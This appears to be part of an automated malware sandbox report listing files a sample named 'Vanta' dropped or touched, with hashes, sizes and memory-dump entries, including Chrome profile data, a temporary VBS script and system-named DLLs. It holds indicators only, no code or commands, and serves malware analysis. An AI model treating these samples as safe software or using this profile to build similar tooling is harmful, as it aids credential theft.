2b846a186d4e311d7b57d479e15d5391cef83a93e80afbc66b4cd1c1e98c38e4774f36747b6ebbfbd266ea7a31b6b29d537368102c947e9542b4c9ea85ff02b9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
4545023c3e634c4fa0387d19c36552bd

SHA1
d968a8b9d0ecfc54afbd85cd2a4c34db12330589

SHA256
2946a930e70e84cd9f3745e70ec1ff7db67dcd7b5d562bb6feaa7d43154068c8

SHA512
ea1a1ab4402ac98463abf1ad08c2603bd7bf131822dde87545eeaf157010c7522031838717e61993983e4d0e79f570484f17ba415929da9bd2902fdfab996d24

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
313cfa4e8222d199d3b8da0a8a9d7876

SHA1
5bc46589629c82e1a20be77939d33fb6a5799eb7

SHA256
210528c1f5b72fb76c00f8fda5f7d8ffb9da8d3bd6c13c276d8e01058941d662

SHA512
efa98f78fd405704c17217a76b022319201231d21e0fe114f39c6c728ffef9493d51f60e63215a73ece4f8e71f3e3d40fa7a6ea388ffb25c9a81333714a691df

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
120B

MD5
38a65800f037ad51044bd127a7053fd6

SHA1
7d0e7beb75700dbe8bb76ef8245bac1408817fc0

SHA256
584b1e81c6340d50273d922c78ad923c649aa91b6291e5cd8fb1dc4cff69829c

SHA512
389c5eba6ff54343eb96659bf90a2fdbba144339f30bb555cdfd1a30278458850524d8e381223295e3d6d12cf04b03e5f939b3db173e74bb810f63718dd54a39

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
144B

MD5
53d3a933bac4331a930abee3a1ff087e

SHA1
bb9d8426b03205cce10f546e80cae4e8192ef07f

SHA256
4e8842e384bd536474b0382d951bf93d31bc47b79eeedd02858533030c914b22

SHA512
0efc8ac4f91fba93aef1ca4d99fffbd32949150fe531fbef2c4aa43c8a8e9015d45b251e86856061d49ce53d8fbd790114682b0155475c70351d60bb643cbc9e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57d4e4.TMP

Filesize
48B

MD5
1c9ebd5ac134ccb1f106b60700f8c0c4

SHA1
554573e9c62998ace20b6599b20596b7b7eb1722

SHA256
66b3e3a791da348271b79a7cda4942d1b6c1a1c054f73c82ecf426e3d9067cfd

SHA512
66b364f7841eac3c54b40f26a55002e57abc561b4a527ae970bbc37704046ef869b01ca54b2f481d71f2dfee1543aff94905d77516176739b7ac0bdeef53def5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
232KB

MD5
417d90dc24b968bd18dc3cc4bc6bc66b

SHA1
b9f15024cf059ebad0356af4c0dee3cfbe999812

SHA256
5c5d7c23c2a115abddbaf207ec251a53a23a7d4947a0abb9bac7814877f74b70

SHA512
55c3ce61e228fb32e51fcec8c2c35a1ff87f71c51fa1a7db1eedd255e5724297e5a4c6ded57b5f56cc36aa48dfdc46ee96ec508642787f4b799e49ec85dd3f35

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
232KB

MD5
bef536a70c31fdaffcd2cc6de170e3db

SHA1
a4bfa420fe55664e9af1bad7fc2c6f3f0fcc6bcb

SHA256
c90916b0bb7e8ed0b7a991a3b1c39f54ac698dd4787e285cb3cf3f91b334c8a1

SHA512
89fbba4709e58c7bd0498810c3179dfd8e07b3c83b33ce04924bbc5c79e97b888d88f0a418bb23dca08b458b8ff6775dffcc33002fc671459acf03a46d363c5b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
232KB

MD5
cc12f1290340227b77c79ce3f8db8e28

SHA1
0913a6e5721ab687e212b148ec8eda164a0fcdce

SHA256
3f54730f64f97db61b13b85b058c03bbce3b113c4f95219c382d878de7f965ce

SHA512
dc7e50533dc7f566f04a9256c9307e0a21600f6467ff5b17b1a0fd6a5fce0c0effda7550f5e890026a614e4bb1a824f3bae5f5b3c51485aae2ff139d267b0962

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
232KB

MD5
c31324d021f991780e314204a7196a27

SHA1
78d99c4f42adcd977d914d28e8b6f9ecab165a19

SHA256
bc7e8e73f75ed9f056b55fd9933d69693238c926c9d81213d6a82b89622fc922

SHA512
7bbd3339b347443ae638f60ac43625910427963146c9e21ef722e80afdaf672dd449d7036c980aace5f9547ce9c736f7dcd86cade8a98ca3d42b702269e98a9a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
232KB

MD5
859aa99f703b82264a626a034abc82ad

SHA1
38c53b5ef4831b38403ef3119c1dc2e314435575

SHA256
4d326b9033e3b42fada20bd0aa2a3239fd1d1b2cd99419e41d675eb7f871cd2e

SHA512
a48cc308b8e35de35ff1c13fae65db075f088abf49c8bf745c6cf2cd13d7e0ed3f6d706be57b79c19938c954a3d2549accc7b9e47c4bae0065532de0172a903a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
232KB

MD5
1f7d01cac6c5ab6267ef263287929dab

SHA1
663b6629cf83d004d98965ae2f03fb345d926ed6

SHA256
7ca5c7017cb0927dc8f77db4d8ea3ac8fa61905b4a8c6b17caefca1074589844

SHA512
487f85d1147c3369b6e34682939332c1bc1bede90e422619589da7864c2e963aa32869c73162efb24e59809f201ff06cbd84895f3c9dec78ebde3040abde06f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
7fdb7df7c20690499c771c54f2fbcf9b

SHA1
6f749ed198f20222cf8dcfb6fca4583d911c3a30

SHA256
c09c7ea5625f52cf22e5be726d63d1e93a390c408251b5b99114ae031dc101b1

SHA512
3b50d0d186039fcc0a84b4cd8a4b3caf71be1b65b666cb03eb7e317fa51bdf4622d7c4b00030205eb48c0e51434b7661db34741385d5dd0b55c0bec3ea253751

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
235a8eb126d835efb2e253459ab8b089

SHA1
293fbf68e6726a5a230c3a42624c01899e35a89f

SHA256
5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

SHA512
a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67609fa5774e6.vbs

Filesize
15KB

MD5
625a96faf53774b7a716f428aff7c716

SHA1
bbdd41915d8a8ef744c4b54364193836b92876fa

SHA256
19fe1a28e499782d3cecb3532ca1c834260d4c2d7e9100f80050f1289f31ea09

SHA512
a313ea7662f346fe095a300da1f70dd70dfdaee3f2efbae412b37f0535d4dd070d794dc25adae7241d6ec4cee392777ef9e6289a357d31465f53b4615da8291b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tiyios3s.1wb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\Downloads\Vanta.zip

Filesize
7.4MB

MD5
12c66aeda17c5052d498e96870e89091

SHA1
deef50a77f175e61f906d706fc0a7f5c31b30e5e

SHA256
21b504248dee1112165f2455964fefc908c3bf2c3f698699514131d445aa7fcc

SHA512
ee16932cda8f2cf6d2d9735fbd633e007f9ada18cb4296da7d6653c7b617edbc04f016bfbc83831f85f85902fa9e12b7242f2e77bfdb4a9a46d1a0ba7bee73fa

Download Submit
C:\Users\Admin\Downloads\Vanta.zip

Filesize
7.4MB

MD5
1522c185ea05a7c169f2a117239d136c

SHA1
63de1c50db87118aeb7c348645db6fd229bd4849

SHA256
efc7fd3f30977873d593e6951d1d7a54660e3c99c1063a703813155480e6d7c8

SHA512
8fbcba7a2e2b3cc6e95d932d8e3bce53934f6c6a084e6e9fa78222db1cdc5d5941af4b4452575d9b80207499d8f4a79045c61f3c4872405394b6ce575e363195

Download Submit
C:\Users\Admin\Downloads\Vanta\Vanta.exe

Filesize
75KB

MD5
3ae377243b164fa134c9a16c5bd6624c

SHA1
faf57bca57138e2df2590230e934fcf8c9ed0848

SHA256
8b6ca8a45ca88f757946901e36ea058651558e9240ceecb54440f88a0bdcb51c

SHA512
fa2c912c4e7b60a5ee2f974fe1f7613149c57c725e6e451b6f23e2422489eaa002d5020dc7c542d33b9035b0e687f08e93302e42fafba479ed076130374d5a03

Download Submit
C:\Users\Admin\Downloads\Vanta\packages\AppVEntSubsystemController.dll

Filesize
1.2MB

MD5
9e57704c04f110094fd8d9eac5745431

SHA1
b98b31e19b472bbc4a4d9364f7c63225e3f5bd93

SHA256
4871a06d76b527358d3d0621aadd56dc606e141522900e92cdf05cbd75afed12

SHA512
360161eacd48921e947d46e680ec9f458e19abe0657b5aec5986e0aaa04edec92d9f1d8544b634d7c880350f3edb8bada8a73e6e7375887e0ee18aff78007ea8

Download Submit
C:\Users\Admin\Downloads\Vanta\packages\AppVEntSubsystems64.dll

Filesize
1.9MB

MD5
d19ef60e1d6549ce4325cf42cf94c9d6

SHA1
fce28ec94ac247ef27e5b1f3649f953e7f97fdff

SHA256
6b331ff82240f8c3024bc626d0e7e0d1068f63fa2e99c606155f2c36b4e3500b

SHA512
e5bcc89e1dfd908e185a6d28f39f2cdffc9b209ffaafc165b167f8bba66c23b1364d5ba94858e02d2812acf4b964203fe83fa40b4b41e793d41677551fbcf3a4

Download Submit
C:\Users\Admin\Downloads\Vanta\packages\AppVEntVirtualization.dll

Filesize
1.5MB

MD5
45bae6a68dc519894a18d9f81c94cdb4

SHA1
d8d5920cdd27752e7c9876584ed4f2eab04fd5c9

SHA256
197e2179f8892d3058a3063138e30331c46d65eb05772668dd6b2b9165534240

SHA512
c28d910388a444d24fb3b3258f6323d5441547561356287269fb51178d31b93105967a468659ec7fb785cbbae913bc9611144e5451320335ba4c4c52f353f733

Download Submit
C:\Users\Admin\Downloads\Vanta\packages\AppVIntegration.dll

Filesize
1.4MB

MD5
73798b6483953b5a59aed6180791bf40

SHA1
2baec84d2fc2b41e84868ad2bb0270eaf9962174

SHA256
685165ce33976fc762d27a7dba50bbe7cac008e731608fb0b31b064b85a9bc7b

SHA512
eb384e35dfd9874b1cdfd1576bee351751b0b5b19e119f46fbd323b770aa5a1b2d4994b8c3e0f265c275242afddf1ec77f3ffa145aeb976040b11044cafb7035

Download Submit
C:\Users\Admin\Downloads\Vanta\packages\AppXDeploymentExtensions.desktop.dll

Filesize
1.7MB

MD5
6aea9ba4f8c3727a7d32a3a438c14edf

SHA1
b60c1681e2b5d425cf0e01164ec38e018e974db4

SHA256
419684f8e5d9fa4ec481f87834b4106132917edc57dc4e0d88bf0ea4d9e42fb8

SHA512
2f744957c8495f77c82404de8d393b0cc8bd9d9b2bbc771f8f02252808aa2ea3cce9f36ad63d9afb478a17e00fca218c97330efb8a1a19d86d19dbc98f709309

Download Submit
C:\Users\Admin\Downloads\Vanta\packages\AppXDeploymentExtensions.onecore.dll

Filesize
2.3MB

MD5
7a04a563505bb04c4d4ac69af764f4b4

SHA1
9ae0839ec0ba0433f85b12c308ea300ef56e838e

SHA256
46bf9d2b9ef31988f83d6e81617951f5e310322cf1c9f9bfffda515896488171

SHA512
1dedfdc817ecc7afe7bca1d3eb8e0ccde7ca922e14a377a465fb50de4e60b4a242eef8e3fdfa8f138fb8c7de66cb1e0233583d9772a4c7b4d7b03a5de70f4b85

Download Submit
C:\Users\Admin\Downloads\Vanta\packages\AppXDeploymentServer.dll

Filesize
3.7MB

MD5
ee488ba52fe47f61752e358c2416c6c8

SHA1
39c482e1c0299fa0beff0152798a3a66c4c47742

SHA256
cfa80cb2ee287b78eecdd65ec9ee06a6dd32451725bc20936f33c5ada814ec4d

SHA512
31741c8017722b3d737645c84b4db36e819f8eae86ba0677087aa09d910856551dd79c79cd934fd41f36a2d1ae3f58ea33fdc460f6ad6d771c55eb8c4d9205ca

Download Submit
C:\Users\Admin\Downloads\Vanta\packages\AppxPackaging.dll

Filesize
1.7MB

MD5
0a316217243e89ef6641907b10b3c737

SHA1
be1c4a3ca8aa70f6f878ffe712802be9ed45fdae

SHA256
54101e17a8fb2a35fce198c962b2c0d217f64a61da8af291cc635541a2895711

SHA512
59116b149b359a517a42472aa90f868226f5ca21641aaf573bad5883e78a7a11dd645ce898966ed46bc3de390c1e2483bf1dacdc4f17a14ab7a50e7cda4fe8c7

Download Submit
C:\Users\Admin\Downloads\Vanta\packages\WdfCoInstaller01009.dll

Filesize
1.6MB

MD5
4da5da193e0e4f86f6f8fd43ef25329a

SHA1
68a44d37ff535a2c454f2440e1429833a1c6d810

SHA256
18487b4ff94edccc98ed59d9fca662d4a1331c5f1e14df8db3093256dd9f1c3e

SHA512
b3d73ed5e45d6f2908b2f3086390dd28c1631e298756cee9bdf26b185f0b77d1b8c03ad55e0495dba982c5bed4a03337b130c76f7112f3e19821127d2cf36853

Download Submit
C:\Users\Admin\Downloads\Vanta\packages\netaapl64.sys

Filesize
22KB

MD5
ee00c544c025958af50c7b199f3c8595

SHA1
1a9320ad1ebcaaa21abb5527d9a55ca265deec5d

SHA256
d774db020d9c46d1aa0b2db9fa2c36c4a9c38d904cc6929695321d32aca0d4d1

SHA512
c08cfb84b6bc98a965b5195b06234646e8f500a0c7e167d8c2961dad3c10da47407d339f1fbd2c3af4104932b94ee042872680d968c3c9b086705d374fc9c94e

Download Submit
memory/3180-1401-0x0000000000400000-0x0000000000456000-memory.dmp

Filesize
344KB

Download
memory/3180-1398-0x0000000000400000-0x0000000000456000-memory.dmp

Filesize
344KB

Download
memory/4544-1374-0x000002CE7B380000-0x000002CE7B3A2000-memory.dmp

Filesize
136KB

Download
memory/4876-1388-0x000001CFA9200000-0x000001CFA9210000-memory.dmp

Filesize
64KB

Download